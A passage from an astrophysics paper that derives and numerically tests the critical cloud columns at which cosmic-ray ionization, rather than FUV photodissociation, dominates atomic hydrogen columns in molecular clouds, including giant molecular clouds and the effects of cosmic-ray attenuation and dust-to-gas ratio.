rate, or to the density to ionization rate for a given temperature, and the logarithmic factor of order unity. In both the weak- and strong-field limits the critical columns are independent of the dust-to-gas ratio \(\tilde{\sigma}_{g}\). The intermediate case, \(\alpha G/2\approx 1\), is also important, because for a narrow range around this UV to gas density ratio (\(I_{\rm UV}/n_{2}\approx 3\)) a two-phased (WNM/CNM) thermal equilibrium is possible for fully atomic (HI) gas (Wolfire et al., 2003; Krumholz et al., 2008; Bialy & Sternberg, 2019, S14). The range for two-phased equilibria is \(\alpha G\sim 1\) to 4, weakly dependent on metallicity. Star-forming gas and associated HI in the Milky Way and other galaxies may be self-regulated to be in a multi-phased state (Ostriker et al., 2010). For such systems, the critical column is then \[N_{\rm crit,CNM}\;=\;\frac{1}{\sigma_{g}}\frac{2\;{\rm ln}(2)}{\beta}\;=\;1.1 \times 10^{22}\;\frac{n_{2}T_{2}^{1/2}C}{\zeta_{-16}}\;\;\;\;\;{\rm cm}^{-2}\;. \tag{32}\] Here we are assuming that heating in the fully dissociated HI layers is via FUV photoelectric emission with negligible energy input by the cosmic-rays so that the thermal phase structure for the HI is primarily dependent on \(\alpha G\), i.e. on the ratio \(I_{\rm UV}/n\)(Wolfire et al., 2003; Bialy & Sternberg, 2019). ### Giant Molecular Clouds Our expressions for the critical cloud columns are for one-sided illumination by a beamed (normally incident) FUV field, e.g. for a cloud irradiated by a nearby hot star. In the ambient medium two-sided irradiation by the background FUV field is more appropriate, and the critical columns are then doubled for a given cosmic-ray ionization rate. Furthermore, the irradiation may be isotropic rather than beamed. For example, for a Galactic giant molecular cloud (GMC) embedded within ambient photodissociated HI containing a two-phased mixture of CNM and WNM the two-sided intermediate case \(\alpha G=2\) applies. Galactic GMCs have characteristic hydrogen column densities \(N_{\rm GMC}\sim 1.5\times 10^{22}\) cm\({}^{-2}\)(Solomon et al., 1987; McKee & Ostriker, 2007; Lada & Dame, 2020; Chevance et al., 2022) that are only weakly dependent on the cloud mass, \(M_{\rm GMC}\), over a large range (\(\sim 10\) to near \(10^{7}\) M\({}_{\odot}\)) implying a mass-radius relation that scales approximately as \(M\sim R^{2}\)(Larson, 1981). With the extra factor of 2 for two-sided illumination, and for beamed fields, it follows from Eq. (32) that the GMCs are just critical for \[\beta\;=\;\frac{0.1}{\tilde{\sigma}_{g}}\times\left(\frac{N_{22,\rm GMC}}{1.5} \right)^{-1}\;\;\;, \tag{33}\] or \[\frac{\zeta_{-16}}{n_{2}}\;=\;1.5\;T_{2}^{1/2}\times C\,\left(\frac{N_{22,\rm GMC }}{1.5}\right)^{-1}\;\;\;, \tag{34}\] independent of \(\tilde{\sigma}_{g}\). Here \(N_{22,\rm GMC}\equiv N_{\rm GMC}/(10^{22}{\rm cm}^{-2})\). Thus, critical GMCs are molecular even without any CR attenuation, and for these \(x_{\rm HI}\approx 0.05\). For a spherical cloud, the average hydrogen density is \[\bar{n}_{2,\rm GMC}\;=\;0.83\;\left(\frac{\langle N_{22,\rm GMC}\rangle}{1.5} \right)^{3/2}M_{6,\rm GMC}^{-1/2}\;\;\;, \tag{35}\] where \(\bar{n}_{2,\rm GMC}\equiv\bar{n}_{\rm GMC}/(100\;{\rm cm}^{-3})\), \(\langle N_{\rm GMC}\rangle\equiv M_{\rm GMC}/\mu\pi R^{2}\) is the mean cloud column, and \(M_{6,\rm GMC}\equiv M_{\rm GMC}/(10^{6}{\rm M}_{\odot})\). The mean mass per particle \(\mu=2.34\times 10^{-24}\) g. For spherical systems irradiation by ambient isotropic FUV fields is the more natural configuration (e.g., McKee & Krumholz, 2010). As discussed by S14 the HI column produced by photodissociation on one side of a plane-parallel slab exposed to isotropic4or a given H\({}_{2}\) photodissociation rate at the cloud surface, the incident radiation flux for isotropic fields is equal to half that for beamed fields, and \(\alpha G\) is divided by 4 rather than 2 in Eq. (36). The factor \(\langle\mu\rangle=0.8\) is an angular average. See S14 for a detailed discussion. radiation is Footnote 4: F \[N_{\rm HI,PDR,i}\ =\ \frac{\langle\mu\rangle}{\sigma_{g}}{\rm ln}\Big{[}\frac{1} {\langle\mu\rangle}\frac{\alpha G}{4}+1\Big{]}\quad, \tag{36}\] where in this expression \(\langle\mu\rangle=0.8\). (The subscript \(i\) refers to isotropic.) For a sphere, for which the PDR is a thin shell surrounding a CRZ core, the mean PDR HI column is \[\langle N_{\rm HI,PDR,i}\rangle\ =\ \frac{4\pi R^{2}\times N_{\rm HI,PDR,i}}{ \pi R^{2}}\ =\ 4\times N_{\rm HI,PDR,i}\quad. \tag{37}\] The mean CRZ HI column is \[\langle N_{\rm HI,CRZ}\rangle\ =\ \frac{\beta}{2+\beta}\ \langle N\rangle \tag{38}\] where \(\langle N\rangle\) is the mean cloud column density. The critical mean column for a spherical cloud in an isotropic FUV field, and without CR attenuation, is then given by \[\langle N\rangle_{\rm crit}\ =\ \frac{2+\beta}{\beta}\times\frac{4\langle\mu \rangle}{\sigma_{g}}{\rm ln}\Big{[}\frac{1}{\langle\mu\rangle}\frac{\alpha G}{4 }+1\Big{]}\quad. \tag{39}\] This expression is analogous to Eq. (28) with the extra factor of 2 for two sided beamed illumination of a slab. The critical \(\beta\) is hardly altered in switching from two-sided beamed slabs to isotropically illuminated spheres. For example, for \(\alpha G=2\), the critical \(\beta\) increases by just \(\sim 10\%\) for spheres. Eqs. (33) and (34) are therefore unaltered for spheres, but with \(N_{\rm 22,GMC}\) understood as the mean GMC column, as in Eq. (35). Setting \(\bar{n}_{\rm 2,GMC}T_{\rm 2,GMC}^{1/2}=n_{2}T_{2}^{1/2}C\) in Eq. (34), and with Eq. (35), we obtain the critical mass \[M_{\rm 6,GMC,crit}\ =\ 1.5\ \frac{T_{\rm 2,GMC}}{\zeta_{-16}^{2}}\ \Big{(}\frac{N_{\rm 2 2,GMC}}{1.5}\Big{)} \tag{40}\] below which the GMCs are FUV dominated, and above which they are cosmic-ray dominated. With any gas clumping inside the GMC, or with the inclusion of CR attenuation, the critical masses will be larger still. It follows from Eq. (40) that for a GMC temperature \(T_{\rm 2,GMC}=0.2\) the critical ionization rate scales as \[\zeta_{-16,{\rm crit}}\ =\ 0.5\times M_{\rm 6,GMC}^{-1/2} \tag{41}\] for a standard \(N_{\rm 22,GMC}=1.5\). More massive GMCs require lower ionization rates to be cosmic-ray dominated because their mean densities are lower. For example, for \(6\times 10^{6}\) M\({}_{\odot}\) near to the upper end of the Galactic GMC mass distribution (Williams & McKee, 1997)\(\zeta_{-16,{\rm crit}}\approx 2\times 10^{-17}\) s\({}^{-1}\). For a more typical GMC mass of \(10^{4}\) M\({}_{\odot}\), the critical ionization rate is \(5\times 10^{-16}\) s\({}^{-1}\). Relaxing the multiphase requirement, and deriving instead the critical column using Eq. (39) for weak (\(\alpha G\ll 1\)) isotropic FUV fields, GMCs are critical for \[\beta\ =\ \frac{7.0\times 10^{-2}}{\tilde{\sigma}_{g}}\times\Big{(}\frac{N_{ \rm 22,GMC}}{1.5}\Big{)}^{-1}\ \alpha G\quad, \tag{42}\] or for \[\zeta_{-16}\ =\ 0.6\ \Big{(}\frac{N_{\rm 22,GMC}}{1.5}\Big{)}^{-1}\ I_{\rm UV}\quad, \tag{43}\] independent of \(\tilde{\sigma}_{g}\), and independent of the gas density or cloud mass. We stress again that Eqs. (42) and (43) hold for either slabs exposed to two-sided beamed fields or spheres illuminated by isotropic radiation. In Eq. (43) we have assumed that \(C=1\) since the PDRs and CRZs overlap in this limit (see SS 3.1.1). Remarkably, in the weak-field limit, and for an ambient \(I_{\rm UV}\approx 1\), the critical ionization rate for typical GMCs is close to the characteristic Galactic ionization rate \(\zeta_{-16}\approx 1\). Our analysis of the GMCs thus far does not include the effects of CR attenuation, which we do consider in SS 3.3 below. CR attenuation increases the critical ionization rates further. ## 3 Computations We now present numerical computations of the HI and H\({}_{2}\) density profiles and integrated HI column densities produced in gas slabs that are irradiated by combined fluxes of FUV photons and cosmic-rays. As is indicated by our analytic expressions Eqs. (19) and (22), the basic dimensionless parameter for the FUV driven HI-to-H\({}_{2}\) density profiles is \(\alpha G\) (Eq. [23]) rather than \(\alpha\) alone (see also S14). For the cosmic-rays the basic parameter is \(\beta\) (Eq.[15]). In this paper we are focussing on the regime \(\beta\lesssim 1\) for which the gas is molecular in the absence of FUV, even without any CR attenuation. But the residual atomic component produced by the cosmic-ray bombardment contributes to the build up of the HI column densities. We consider a wide range of conditions i.e., a range of \(\alpha G\), and \(\beta\), for varying dust-to-gas abundance ratios \(\tilde{\sigma}_{g}\), and we present results with and without the inclusion of cosmic-ray attenuation. We use _Scipy_ ODEINT to integrate Eq. (13) and solve for \(x_{\rm HI}/x_{\rm H_{2}}\) as a function of gas column \(N\equiv N_{\rm HI}+2N_{\rm H_{2}}\), subject to \(x_{\rm HI}+2x_{\rm H_{2}}=1\), for any \(\alpha G\), \(\beta\) and \(\tilde{\sigma}_{g}\). When including CR attenuation we use the simple power-law form Eq. (12) for \(s(N)\), assuming a normal magnetic field orientation \({\rm cos}\theta=1\) in the definition of \(N_{\rm eff}\). We compare our numerical integrations to our analytic approximations for \(N_{\rm HI}(N)\) given by Eqs. (19) and (22). As our first example, in Fig. 1 we show results for \(\alpha G=1\), \(\beta=0.1\), and \(\tilde{\sigma}_{g}=1\). The FUV radiation and cosmic-rays are incident from the left (one-sided irradiation). In the upper panel, CR attenuation is not included. In the lower panel CR attenuation is included. For \(\alpha G=1\), and with \(\tilde{\sigma}_{g}=1\), the ratio of the (unattenuated) FUV field intensity to the gas density \(I_{\rm UV}/n_{2}=1.7\), for a temperature \(T_{2}=1\) (see Eq. [23]). The average self-shielding factor \(G=3.0\times 10^{-5}\) (Eq. [21]). For \(\beta=0.1\), the ratio of the cosmic-ray ionization rate to the gas density is \(\zeta_{-16}/n_{2}=3.33\), for \(C=\sqrt{5}\), and \(\phi=2\) (see Eq. [15]). We plot \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\) (blue and orange curves) as functions of the hydrogen column density \(N\). The corresponding dust opacity, \(\tau_{\rm dust}\), is shown along the auxiliary (upper) \(x\)-axes. The black dashed curves are the depth-dependent HI column densities found in our numerical integration of Eq. (13). The column density scale is shown along the righthand auxiliary \(y\)-axis. The overlying red dashed curves show the analytically computed HI columns. The agreement between the numerical and the analytically computed HI columns is excellent. As expected, the hydrogen is primarily atomic at the cloud edges, and the molecular fractions are very small, with \(x_{\rm H_{2}}\approx x_{\rm H_{2}}/x_{\rm HI}=2/\alpha=6.2\times 10^{-5}\). Within the CRZs the gas is primarily molecular. In the absence of CR attenuation the HI fractions approach a cosmic-ray floor \(x_{\rm HI}=\beta/2=5\times 10^{-2}\) (upper panel). The red marker dots indicate the numerically computed HI-to-H\({}_{2}\) transition points, defined as the cloud depths where \(x_{\rm HI}=2x_{\rm H_{2}}\) (or \(x_{\rm HI}=1/2\)). For the models in Fig. 1 these occur at \(N_{\rm tran}=1.4\times 10^{20}\) cm\({}^{-2}\), or \(\tau_{\rm dust, tran}=0.26\). The vertical dashed green lines indicate these positions as given by the analytic BS16 formula for the transition point (their Eq. [39]). We discuss this formula in the Appendix (Eq. [A1])) and its continued range of applicability when cosmic-rays are included. The vertical red dashed lines mark the columns, \(N_{90}\), where 90% of the incident FUV radiation is absorbed. This occurs at \(\tau_{\rm dust}\sim 1\), and defines the inner edge of the PDR. The HI column produced by photodissociation is \(N_{\rm HI,PDR}=2.1\times 10^{20}\) cm\({}^{-2}\) (see Eq. [24]). The vertical blue dashed lines mark the critical columns, \(N_{\rm crit}\) where the cosmic-rays start dominating the growth of the HI columns. Without CR attenuation this occurs at \(N_{\rm crit}=4.4\times 10^{21}\) cm\({}^{-2}\). The corresponding critical dust opacity is \(\tau_{\rm dust,crit}=8.4\). When CR attenuation is included (lower panel) the atomic fraction falls below the \(\beta=0.1\) cosmic-ray floor of \(5\times 10^{-2}\) without attenuation. The "knee" in the HI profile near \(N=2\times 10^{21}\) cm\({}^{-2}\) is where the more slowly attenuating CR ionization processes take over from exponentially reduced photodissociation in producing the HI. The atomic fraction continues to decline at greater cloud depths as \(\beta s(N)/2\), and becomes very small. The much reduced HI abundance in the CRZ when CR attenuation is included moderates the growth of the HI column density (see Fig.1) and the critical column is now \(N_{\rm crit}=7.1\times 10^{22}\) cm\({}^{-2}\), or \(\tau_{\rm dust,crit}=135.3\). When CR attenuation is included the CRZ must be 135 times larger than the PDR for cosmic-rays to contribute significantly to the production of the HI. ### Model Grid: No CR Attenuation, and \(\tilde{\sigma}_{g}=1\) #### 3.1.1 HI and H\({}_{2}\) Profiles In Fig. 2 we present an \(\alpha G\) versus \(\beta\) model grid for the HI-to-H\({}_{2}\) density profiles, and integrated HI column densities, assuming \(\tilde{\sigma}_{g}=1\), and no attenuation of the cosmic-ray ionization rates (\(s=1\)). From top to bottom, \(\alpha G\) ranges from 0.01 (weak-field limit) to 10 (strong field limit). From left to right \(\beta\) ranges from 0 to 1, i.e., weak to moderate5 cosmic-ray irradiation. For \(\tilde{\sigma}_{g}=1\) these ranges correspond to \(I_{\rm UV}/n_{2}\) from \(1.7\times 10^{-2}\) to 17.0, and \(\zeta_{-16}/n_{2}\) from 0 to 33.3 (for \(C=\sqrt{5}\), \(T_{2}=1\), and \(\phi=2\)). Footnote 5: We reserve the term “strong cosmic-ray irradiation” for \(\beta>2\) systems for which HI-to-H\({}_{2}\) transitions do not occur without CR attenuation. See Appendix. As in Fig. 1, in each panel we show the HI and H\({}_{2}\) fractions, \(x_{\rm HI}\) (blue curves) and \(2x_{\rm H_{2}}\) (orange curves), as computed by integrating Eq. (13) numerically. The black and red dashed curves are the HI column densities found in our numerical integrations and using our analytic formulae respectively. The agreement between the two curves is excellent across the entire parameter space. Again, the hydrogen is atomic at the cloud edges, and the molecular fractions are very small, with \(x_{\rm H_{2}}\approx x_{\rm H_{2}}/x_{\rm HI}=2/\alpha\) from \(6.2\times 10^{-3}\) to \(6.2\times 10^{-6}\). Within the CRZs the gas is (by assumption) primarily molecular, and the HI fractions approach \(x_{\rm HI}=\beta/2\), i.e. range from \(5\times 10^{-4}\) to 0.5, from small to moderate cosmic-ray ionization rates. The red dots are the HI-to-H\({}_{2}\) transition points. For the range of \(\alpha G\) in Fig. 2 these occur at gas columns, \(N_{\rm tran}\), equal to \(1.9\times 10^{17}\), \(3.9\times 10^{18}\), \(1.4\times 10^{20}\), and \(9.1\times 10^{20}\) cm\({}^{-2}\), corresponding to dust optical depths, \(\tau_{\rm dust}\), equal to \(3.6\times 10^{-4}\), \(7.4\times 10^{-3}\), 0.26, and 1.7. The vertical green dashed lines show these positions using the BS16 formula, Eq. (A1). In the weak-field limit (small \(\alpha G\)) an HI-to-H\({}_{2}\) transition is induced by H\({}_{2}\) self-shielding at small cloud depths where \(\tau_{\rm dust}\ll 1\), and dust attenuation is irrelevant for the transition point. Most of the photodissociated HI column density is built up _inside_ the predominantly molecular zone, up to \(\tau_{\rm dust}\approx 1\) where the FUV is finally fully absorbed. In the strong field limit (large \(\alpha G\)) the fully atomic layer becomes sufficiently large that the dust associated with this layer (the "HI-dust") dominates the absorption of the FUV. The transition to H\({}_{2}\) is then very sharp, and most of the HI column is produced in the outer fully dissociated layer. Because we are assuming \(\beta\leq 1\) the cosmic-rays do not inhibit transitions to molecular gas as the clouds become optically thick to the FUV, and the transition points are unaffected (see Appendix). The vertical red dashed lines shown for the \(\beta=0\) cases (leftmost column in Fig. 2) show the FUV "absorption columns", \(N_{90}\), where 90% of the photodissociated HI columns are built up. The 90% absorption depths occur at \(\tau_{\rm dust}\approx 1\), independent of \(\alpha G\), and are unaffected by the presence of cosmic-rays. We do not display the \(N_{90}\) lines for the \(\beta\neq 0\) panels. Instead, for \(\beta\neq 0\) the vertical blue dashed lines indicate the critical gas columns, \(N_{\rm crit}\), and dust opacities, \(\tau_{\rm dust,crit}\), where the cosmic-ray and FUV contributions to the integrated HI columns are equal. #### 3.1.2 Critical Dust Opacities and Gas Columns: No CR Attenuation Without significant cosmic-ray attenuation the HI column densities diverge with increasing cloud gas column (see Eq. [22]). The critical gas columns indicated by the blue vertical lines are consistent with Eqs. (28)-(32). For example, for \(\alpha G=0.01\) and \(\beta=0.001\), \(\tau_{\rm dust,crit}\approx\alpha G/\beta=10\) and \(N_{\rm crit}=5.3\times 10^{21}\) cm\({}^{-2}\) (see Eq. [30]). As \(\beta\) is increased for \(\alpha G=0.01\), the critical point moves inward and the PDRs and CRZs overlap, as seen in the top row of Fig. 2, and as expected for the weak-field limit. As another example, and now for the strong field limit, for \(\alpha G=10\) and \(\beta=0.1\), \(\tau_{\rm dust,crit}\approx 2{\rm ln}(\alpha G)/\beta=32\), and \(N_{\rm crit}=1.7\times 10^{22}\) cm\({}^{-2}\) (see Eq. [31]). As \(\beta\) is increased in the strong field limit, \(\tau_{\rm dust,crit}\) approaches the sharp HI-to-H\({}_{2}\) transition point, and the blue dashed lines approach the green dashed lines in Fig. 2. In Fig. 3, we plot curves as given analytically by Eq. (29) for the critical dust opacities, \(\tau_{\rm dust,crit}\), as functions of \(\alpha G\) and \(\beta\). The blue squares are the critical opacities as found numerically in Fig. 2. They lie very close to the analytic curves. The auxiliary \(y\)-axes in Fig. 3 show the corresponding critical gas column densi ties assuming \(\tilde{\sigma}_{g}=1\) (Eq. [28]). The left panel displays \(\tau_{\rm dust,crit}\) as a function of \(\beta\) (or \(\zeta_{-16}/n_{2}C\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\alpha G\) from 0.01 to 100. The right panel displays curves for \(\tau_{\rm dust,crit}\) as a function of \(\alpha G\) (or \(I_{\rm UV}/n_{2}\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\beta\) from 0.001 to 1. The curves illustrate the limiting behaviors given by Eqs. (30) and (31). For a given \(\alpha G\) the critical dust opacities and gas columns always vary inversely with \(\beta\). For a given \(\beta\), they vary linearly with \(\alpha G\) in the weak-field limit (\(\alpha G\ll 1\)) and logarithmically with \(\alpha G\) in the strong-field limit (\(\alpha G\gg 1\)). The horizontal dashed blue line in Fig. 3 is the \(\tau_{\rm dust}=1\) boundary between the PDR and the CRZ. The curves again show that in the weak-field limit, \(\alpha G\ll 1\) cosmic-ray production of the HI can become competitive with photodissociation already within the PDRs (i.e. within \(\tau_{\rm dust}\lesssim 1\)). Conversely, in the strong-field limit, \(\alpha G\gg 1\), the critical opacities become large with \(\tau_{\rm dust,crit}>1\), even if \(\beta\) approaches 1. In this limit the cosmic-ray production of the HI occurs mainly in the optically thick cloud interiors. ### Model Grid: With Cosmic-Ray Attenuation #### 3.2.1 HI and H\({}_{2}\) Profiles In Fig. 4 we display the same \(\alpha G\) versus \(\beta\) grid for the HI and H\({}_{2}\) profiles as in Fig. 2 but now with the inclusion of cosmic-ray attenuation. We again assume \(\tilde{\sigma}_{g}=1\). In all panels, we assume the broken power-law CR attenuation function \(s(N)\) as given by Eq. (12), with cos\(\theta=1\) for the magnetic field orientation. The effect of the cosmic-ray attenuation is most clearly seen for \(\beta=1\) in the righthand column of Fig. 4. Without attenuation the HI fraction \(x_{\rm HI}=1/3\) at large depths for \(\beta=1\) (see Fig. 2), and the integrated HI columns therefore rise sharply with increasing cloud depth. With attenuation the local HI fractions decrease and the resulting integrated HI columns are reduced. The black dashed curves in Fig. 4 show the HI columns found by numerically integrating Eq. (13) (again using Figure 2: HI-to-H\({}_{2}\) density profiles as functions of the gas column \(N\) (lower x-axes) and the dust optical depth \(\tau_{\rm dust}\) (upper x-axes) for \(\alpha G\) from 0.01 (weak field) to 10 (strong field), and for cosmic-ray parameters \(\beta\) from 0 to 1, and with no cosmic-ray attenuation. The gas-to-dust ratio \(\tilde{\sigma}_{g}=1\). The curves are for the HI fractions \(x_{\rm HI}\) (blue), twice the H\({}_{2}\) fraction \(2x_{\rm H_{2}}\) (orange), and the HI column density \(N_{\rm HI}\), integrated numerically (dashed black), and using our analytic formula Eq. (19) (dashed red). The red dots mark the HI-to-H\({}_{2}\) where \(x_{\rm HI}=2x_{\rm H_{2}}\). The analytic approximation for the transition points (Eq.[A1]) are indicated by the vertical dashed green lines. For \(\beta=0\) (left column) the vertical dashed red lines are for \(N_{90}\) where 90% of the photodissociated HI columns are built up. For \(\beta\neq 0\) the vertical dashed blue lines mark the critical cloud depths where the cosmic-ray contributions to the HI columns are equal to the photodissociated HI columns. \(S_{\rm{c}ip}\)) ODEINT), but now including the attenuation function \(s(N)\). The red dashed curves show the HI columns computed using our analytic approximation Eq. (19) using Eq. (27) for the CR term. The agreement between the numerical solution and the analytic representation is excellent. As in Fig. 2 the vertical blue lines in Fig. 4 mark the critical cloud depths at which the FUV and CR contributions to the HI columns are equal. Due to the reductions in the HI fractions in the CRZs the critical depths are increased compared to the no CR attenuation case. The effect is especially significant in the strong FUV field limit \(\alpha G>1\) for which the FUV contributions to the HI columns become large. (In some of the panels in Fig. 2 the blue markers do not appear because the critical depths are off scale high). The red dots in Fig. 4 show the HI-to-H\({}_{2}\) transition points where \(x_{\rm{HI}}=2x_{\rm{H_{2}}}\). The vertical green lines mark the transition points as estimated using the BS16 formula Eq. (A1). The positions of the transition points are fully controlled by the FUV radiation absorption, and are not affected by the presence of cosmic rays or the inclusion of CR attenuation. #### 3.2.2 Critical Dust Opacities and Gas Columns: With CR Attenuation In Fig. 5, we plot curves for the critical dust opacities, \(\tau_{\rm{dust,crit}}\), as functions of \(\alpha G\) and \(\beta\), but now with the inclusion of CR attenuation as for the profiles shown in Fig. 4. To generate these curves we modify Eq. (29) for \(\tau_{\rm{dust,crit}}\) by making the replacement given by Eq. (27) in Eq. (22). The left panel displays curves for \(\tau_{\rm{dust,crit}}\) as functions of \(\beta\) (or \(\zeta_{-16}/n_{2}C\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\alpha G\) from 0.01 to 100. The right panel shows \(\tau_{\rm{dust,crit}}\) versus \(\alpha G\) (or \(I_{\rm{UV}}/n_{2}\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\beta\) from 0.001 to 1. The auxiliary \(y\)-axes in Fig. 3 show the corresponding critical gas column densities assuming \(\tilde{\sigma}_{g}=1\). The blue squares are the results of the numerical integrations found in Fig. 4, and they lie very close to the analytic curves. The primary affect of CR attenuation is to steepen the critical curves, since attenuation dampens the growth of the HI columns preferentially at low \(\beta\) and large \(\alpha G\). For example, for \(\alpha G=0.01\) and \(\beta=0.001\), \(\tau_{\rm{dust,crit}}\) is increased to from 10 to 200 when CR attenuation is included, with \(N_{\rm{crit}}\) increasing to \(1.1\times 10^{23}\) cm\({}^{-2}\). As \(\beta\) is increased for \(\alpha G=0.01\), the critical points move Figure 3: Critical dust opacities, \(\tau_{\rm{dust,crit}}\), at which the cosmic-ray contributions to the HI column densities are equal to the photodissociated HI columns. Right panel: \(\tau_{\rm{dust,crit}}\) as functions of \(\alpha G\) with individual curves as given by our analytic expression Eq.(29), for \(\beta\) from 0.001 to 1. The blue squares are the numerically computed critical depths shown in Fig. 2. The auxiliary axes for \(I_{\rm{UV}}/n_{2}\) and \(N_{\rm{crit}}\) are for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The horizontal blue dotted line is for \(\tau_{\rm{dust}}=1\) below which photodissociation and cosmic-ray production of the HI overlap (see text). The horizontal red dotted line corresponds to the typical half-column density of Galactic GMCs. The vertical green line marks the intermediate \(\alpha G\approx 2\) regime for which multiphased HI is possible, and within the grey strip for which multi-phased HI is possible for FUV heated gas. Left panel: \(\tau_{\rm{dust,crit}}\) as functions of \(\beta\) with individual curves as given by our analytic expression Eq.(29), for \(\alpha G\) from 0.01 to 100. The blue squares are the numerically computed critical depths shown in Fig. 2. The auxiliary axes for \(\zeta_{-16}/n_{2}C\) and \(N_{\rm{crit}}\) are for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The horizontal blue dotted line is for \(\tau_{\rm{dust}}=1\) below which photodissociation and cosmic-ray ionization overlap. The horizontal red dotted line corresponds to the typical half-column density of Galactic GMCs. Figure 4: Model grid with curves and markers as in Fig. 2, but with the inclusion of CR attenuation. Figure 5: As in Fig. 3 for the critical dust opacities, but with the inclusion of CR attenuation. inward, the PDRs and CRZs overlap as seen in the top row of Fig. 4, and the attenuation effects are reduced due to the rapid build up of the CR contributions. As another example, for \(\alpha G=1\) and \(\beta=0.1\), \(\tau_{\rm dust,crit}\) increases from 8.5 to 135. with \(N_{\rm crit}\) increasing to \(7.1\times 10^{22}\) cm\({}^{-2}\). ### GMCs and Multiphased HI The horizontal red dashed lines in Figs. 3 and 5 mark the half-column, \(N_{\rm GMC}/2=7.5\times 10^{21}\) cm\({}^{-2}\), for typical Galactic GMCs, as discussed in SS 2.4. For any \(\alpha G\) and \(\beta\) for which \(N_{\rm crit}<N_{\rm GMC}/2\), the GMC is "supercritical" and the CRZ dominates the total HI column density. For \(N_{\rm crit}>N_{\rm GMC}/2\) the GMCs are "subcritical" and the PDR dominates the HI. GMCs are just critical for \(\alpha G\) and \(\beta\) at the intersections of the critical curves with the \(N_{\rm GMC}/2\) line. As discussed in SS 2.4, without CR attenuation and in the weak-field limit GMCs are critical for \(\beta\approx 7.0\times 10^{-2}\alpha G\), or for \(\zeta_{-16}\approx 0.6I_{\rm UV}\) (Eqs. [42] and [43]). This relation is seen in Fig. 3 moving along the red line for small \(\alpha G\). As shown in Fig. 5, with CR attenuation the critical \(\beta\) and \(\zeta_{-16}\) are much larger. For example, for \(\alpha G=0.1\), and without CR attenuation \(\beta=7.0\times 10^{-3}\) for critical GMCs, and this increases to \(6.0\times 10^{-2}\) when CR attenuation is included. Or, for \(I_{\rm UV}=1\), the critical ionization rate \(\zeta_{-16}\) increases from 0.6 to 5.1 for models with and without CR attenuation respectively. The vertical green dashed lines in the righthand panels of Fig. 3 and 5 mark the intermediate \(\alpha G=2\) case (nominally \(I_{\rm UV}/n_{2}\approx 3\)), for which multiphased (WNM/CNM) HI is possible in the PDRs, as indicated by the grey strip. Without CR attenuation, and at \(\alpha G=2\), the red GMC line in Fig. 3 intersects the critical curve for \(\beta=0.1\). This is as given by Eq. (33). Fig. 5 shows that \(\beta=0.9\) when CR attenuation is included for critical GMCs with \(\alpha G=2\). For example, for the nominal \(I_{\rm UV}/n_{2}\approx 3\), the critical ratio \(\zeta_{-16}/(n_{2}C)\) increases from 1.5 to 13.5. The critical free-space ionization rate then scales with GMC mass as \[\zeta_{-16,{\rm crit}}\approx 4.5\times M_{6,{\rm GMC}}^{-1/2} \tag{44}\] when CR attenuation is included. As discussed in SS2.4, the critical columns and ionization rates for spheres illuminated isotropically are essentially identical to the critical values for two-sided slabs, where the gas column \(N\) for slabs is replaced by the mean column \(\langle N\rangle\) for spheres. This is because \(2N_{\rm HI,PDR,i}\approx N_{\rm HI,PDR}\) (see Eqs. [24] and [36]). In Fig. 6 we further consider the \(\alpha G=2\) case. We show the HI fractions \(x_{\rm HI}\) (blue dashed curves), and integrated HI column densities \(N_{\rm HI}\) (black curves), for several values of \(\beta\). In the upper panel CR attenuation is excluded, and in the lower panel CR attenuation is included. For both the dust-to-gas ratio is \(\tilde{\sigma}_{g}=1\). For \(\alpha G=2\) the HI column produced by photodissociation is \(N_{\rm HI,FUV}=3.65\times 10^{20}\) cm\({}^{-2}\). The horizontal green lines are at twice this value (see the righthand column density scale) and the intersections with the \(N_{\rm HI}\) curves are at the critical cloud depths for each \(\beta\). The vertical red lines mark the typical half-column of \(7.5\times 10^{20}\) cm\({}^{-2}\) for the Galactic GMCs. Without CR attenuation we again see that GMCs are critical for \(\beta=0.1\). With CR attenuation the critical value is much larger with \(\beta=0.9\) Figure 6: HI fractions \(x_{\rm HI}\) (dashed blue curves) and integrated HI columns \(N_{\rm HI}\) (black curves) versus cloud depth, as parameterized by the gas column, \(N\), or the dust optical depth, \(\tau_{\rm dust}\), for the intermediate, beamed field, \(\alpha G=2\) case for multiphased HI, for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The curves are labelled by the assumed values of \(\beta\). In the upper panel CR attenuation is not included, and in the lower panel CR attenuation is included. The horizontal green line is for an HI column equal to twice the photodissociated column for \(\alpha G=2\). The vertical red line marks the half gas column for typical Galactic GMCs. This corresponds to a very large free-space ionization rate to density ratio \(\zeta_{-16}/(n_{2}CT_{2}^{1/2})=13.4\). ### Dust-to-Gas Ratio How do the HI-to-H\({}_{2}\) profiles depend on the assumed dust-to-gas ratio, as parameterized by our \(\tilde{\sigma}_{g}\)? The dust-to-gas ratio (as controlled by the overall metallicity) enters in two ways. First via the H\({}_{2}\) dust-grain formation rate coefficient \(R\) (eq. [3]), and second via the FUV dust absorption cross section \(\sigma_{g}\) (Eq. [6]). The formation rate coefficient, \(R\), appears in the denominators of our dimensionless parameters \(\alpha\) and \(\beta\) (Eqs. [14] and [15]) in our ODE Eq. (13). The dust absorption cross section, \(\sigma_{g}\), appears in the definition of the dust optical depth, \(\tau_{\rm dust}\), in Eq. (13). But importantly, the fundamental parameter \(\alpha G\) is only weakly dependent6 on \(\tilde{\sigma}_{g}\) due to the cancellation when taking the ratio \(\sigma_{g}/R\) (see Eq. [23]). Footnote 6: The term \((9.9/[1+8.9\tilde{\sigma}])^{0.37}\) in the definition of \(G\) (Eq. [21]) accounts for the dependence of the “H\({}_{2}\)-dust limited photodissociation rate” on \(\tilde{\sigma}_{g}\). To keep \(\alpha G\) fixed when varying \(\tilde{\sigma}_{g}\) requires a corresponding alteration of \(\alpha\) or the ratio \(I_{\rm UV}/n\). See S14 for a detailed discussion. BS16 studied the \(\beta=0\) case (i.e. no cosmic rays) and found that when expressed in terms of \(\tau_{\rm dust}\) (rather than the gas column \(N\)) then to a very good approximation, especially for \(\tilde{\sigma}_{g}\) in the range 0.1 to 10, the HI-to-H\({}_{2}\) transition points depend on just \(\alpha G\) independent of \(\tilde{\sigma}_{g}\). This is the essence of our Eq. (A1). This invariance is somewhat 